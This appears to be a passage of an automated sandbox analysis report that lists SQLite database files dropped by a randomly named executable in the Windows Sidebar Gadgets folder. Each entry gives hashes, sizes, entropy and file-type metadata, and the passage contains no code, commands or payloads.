                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
